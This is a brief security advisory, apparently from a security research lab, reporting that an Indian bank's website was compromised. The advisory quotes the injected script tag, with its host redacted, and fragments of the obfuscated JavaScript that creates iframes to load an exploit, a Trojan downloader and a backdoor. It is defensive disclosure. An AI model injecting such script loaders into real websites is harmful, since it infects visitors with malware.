Websense® Security LabsT has discovered that the official site for Indian Syndicate Bank (www.syndicatebank.in),
was compromised with a malicious script that attempts to exploit
multiple vulnerabilities. When customers visit the web site, a
malicious JavaScript file (e.js) is executed and creates two additional
iframes in the page.

<script src=http://< URL REMOVED >/e.js></script>

Snippet of js code:

document.writeln(“\/\/xxxx mca By Mr.0wen\/\/”);

%220%22%20FraMebOrder %3D%220%22%3E%3C\/IFraMe%3E\”));”);
document.writeln(“\/\/xxxx mca By Mr.0wen\/\/”);

JavaScript from e.js (seen above) creates two new IFRAME elements
within the page. One IFRAME attempts to load exploit code and the other
creates several additional IFRAMEs that contain advertisement-related
content. The exploit will try to load a Trojan Downloader (qq.exe)
which will contact a remote server to download the following Trojan
Downloader and Backdoor:

http://< URL REMOVED >/hxw/hx/200512.exe
http://< URL REMOVED >/hxw/hx/dd.exe

The site appears to have been cleaned a few hours ago.

Details …